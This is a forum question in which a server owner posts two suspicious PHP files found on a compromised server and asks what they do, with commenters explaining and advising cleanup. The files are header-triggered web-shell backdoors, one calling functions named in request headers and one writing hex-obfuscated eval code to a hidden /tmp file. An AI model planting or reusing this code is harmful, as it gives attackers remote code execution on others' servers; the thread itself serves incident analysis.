# suspicious PHP file contains getallheaders

Tags: php

I am new in PHP. I have found that I have some suspicious PHP files in my server which have code like

```
<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['Large-Allocation'])) {
    $dbx_convert = $_HEADERS['Large-Allocation']('', $_HEADERS['Sec-Websocket-Accept']($_HEADERS['X-Dns-Prefetch-Control']));
    $dbx_convert();
}
```

and

```
<?php
$_HEADERS = getallheaders();
if (isset($_HEADERS['If-Unmodified-Since'])) {
    $c = "<\x3f\x70h\x70\x20@\x65\x76a\x6c\x28$\x5f\x48E\x41\x44E\x52\x53[\x22\x43l\x65\x61r\x2d\x53i\x74\x65-\x44\x61t\x61\x22]\x29\x3b@\x65\x76a\x6c\x28$\x5f\x52E\x51\x55E\x53\x54[\x22\x43l\x65\x61r\x2d\x53i\x74\x65-\x44\x61t\x61\x22]>
    $f = '/tmp/.'.time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
}
```

I have never written such files so, its hacker who have written files, I am not understanding above code, what actually its doing.

also I have checked /tmp/ folder in my server but its not contains any files mentioned above.

Let me know if anyone here can help me for the same.

Thanks!

Comment: If this code isn't part of the application and shouldn't be there, does it really matter what the code does?  Remove the code, update and patch any tools you're using, and re-deploy from source control.  (Make sure the errant code hasn't made its way into source control too of course.)

Comment: @David I have already deleted that all files but I am trying to understand what actually that files and code is doing so I can take care in future.

Comment: The first one tries to dynamically call a function, based on value that got passed as request headers with specific names. And the second one writes a specific byte sequence to a file in your tmp folder.

Comment: And if you simply echo that sequence of hexadecimal byte sequences interjected with "regular characters", you'll see that that also generates PHP code, which again tries to do stuff based on what headers got passed - https://3v4l.org/4K2P7

Comment: https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server

Comment: _"I am trying to understand what actually that files and code is doing so I can take care in future"_ - Knowing what that code does won't help you prevent future code injections. You should rather make sure you plug all holes in your code/server to prevent future attacks.